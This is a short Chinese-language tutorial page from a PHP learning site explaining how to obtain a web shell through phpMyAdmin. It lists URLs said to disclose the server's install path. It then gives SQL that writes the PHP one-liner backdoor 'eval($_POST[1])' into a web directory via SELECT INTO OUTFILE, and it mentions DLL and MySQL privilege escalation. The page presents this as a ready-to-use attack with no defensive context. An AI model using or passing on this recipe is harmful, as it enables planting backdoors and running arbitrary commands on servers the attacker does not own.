来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 简单的方法如下:1.想办法找路径 利用PHPmyadmin 导出Shell 如 phpmyadmin早起的暴路径文件漏洞http://www.2cto.com /phpmyadmin/libraries/lect_lang.lib.phphttp://www.2cto.com/phpmyadmin/themes/darkb......
|
简单的方法如下:
1.想办法找路径 利用PHPmyadmin 导出Shell 如 phpmyadmin早起的暴路径文件漏洞
http://www.2cto.com /phpmyadmin/libraries/lect_lang.lib.php
http://www.2cto.com /phpmyadmin/themes/darkblue_orange/layout.inc.php
二:提权
选择一个Database.运行以下语句.
—-start code—
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php eval($_POST[1]);?>’);
select cmd from a into outfile ‘D:/phpMyAdmin/libraries/d.php’;
Drop TABLE IF EXISTS a;
—-end code—
还有其他方法比如: Dll的提权 MYSQL提权等
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
